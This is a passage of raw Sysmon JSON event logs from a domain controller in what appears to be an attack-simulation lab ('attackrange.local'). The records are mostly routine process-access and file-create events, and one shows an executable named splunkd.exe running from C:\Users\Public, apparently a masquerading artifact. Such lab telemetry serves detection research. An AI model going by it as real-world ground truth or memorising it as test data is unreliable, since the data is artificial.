07:02:00.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8321,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8322,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8323,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8324,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.529\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001061AF0C00}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.529","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001061AF0C00}","TargetProcessId":"4852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8325,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.669\r\nSourceProcessGUID: {E2A3D6B1-1368-5F25-0000-0010748E0E00}\r\nSourceProcessId: 4852\r\nSourceThreadId: 4764\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.669","SourceProcessGUID":"{E2A3D6B1-1368-5F25-0000-0010748E0E00}","SourceProcessId":"4852","SourceThreadId":"4764","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8326,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.810\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.810","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8327,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:01.404\r\nProcessGuid: {E2A3D6B1-1367-5F25-0000-001012890E00}\r\nProcessId: 4960\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1360-0\\System.Data.SqlXml.dll\r\nCreationUtcTime: 2020-08-01 07:02:01.404","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:01.404","ProcessGuid":"{E2A3D6B1-1367-5F25-0000-001012890E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1360-0\\System.Data.SqlXml.dll","CreationUtcTime":"2020-08-01 07:02:01.404","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8328,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:01.466\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-0010DA0E0D00}\r\nTargetProcessId: 5092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:01.466","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-0010DA0E0D00}","TargetProcessId":"5092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 